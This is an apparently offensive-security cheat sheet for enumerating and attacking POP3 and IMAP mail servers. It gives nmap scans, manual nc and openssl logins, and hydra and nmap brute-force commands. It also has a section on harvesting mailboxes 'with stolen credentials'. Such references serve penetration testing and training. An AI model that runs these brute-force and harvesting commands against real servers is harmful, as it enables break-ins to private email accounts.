Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Service Detection
nmap -sV -sC -p 110,143,993,995 TARGET
POP3 (Port 110 / 995 TLS)
Manual Login
nc -nv TARGET 110
USER admin
PASS password
LIST
RETR 1
QUIT
OpenSSL (TLS)
openssl s_client -connect TARGET:995
Commands
| Command | Description |
|---|
USER <user> | Set username |
PASS <pass> | Set password |
LIST | List messages |
RETR <n> | Retrieve message n |
DELE <n> | Delete message n |
QUIT | Disconnect |
IMAP (Port 143 / 993 TLS)
Manual Login
nc -nv TARGET 143
a1 LOGIN user password
a2 LIST "" "*"
a3 SELECT INBOX
a4 FETCH 1 BODY[]
a5 LOGOUT
OpenSSL (TLS)
openssl s_client -connect TARGET:993
Commands
| Command | Description |
|---|
LOGIN user pass | Authenticate |
LIST "" "*" | List mailboxes |
SELECT INBOX | Open inbox |
SEARCH ALL | List all messages |
FETCH n BODY[] | Read message n |
LOGOUT | Disconnect |
Brute-Force
POP3
hydra -L users.txt -P passwords.txt pop3://TARGET
hydra -L users.txt -P passwords.txt pop3s://TARGET
IMAP
hydra -L users.txt -P passwords.txt imap://TARGET
hydra -L users.txt -P passwords.txt imaps://TARGET
Harvest Emails
Download All via POP3
# Using curl
curl -u user:password pop3://TARGET/1
Using Evolution / Thunderbird
Configure client with stolen credentials to browse all mail.
NSE Scripts
nmap -p 110 --script pop3-brute TARGET
nmap -p 143 --script imap-brute TARGET
nmap -p 110 --script pop3-capabilities TARGET
nmap -p 143 --script imap-capabilities TARGET
Quick Reference
| Check | Command |
|---|
| POP3 login | nc TARGET 110 → USER/PASS |
| IMAP login | nc TARGET 143 → LOGIN user pass |
| POP3 brute | hydra -L users.txt -P pass.txt pop3://TARGET |
| IMAP brute | hydra -L users.txt -P pass.txt imap://TARGET |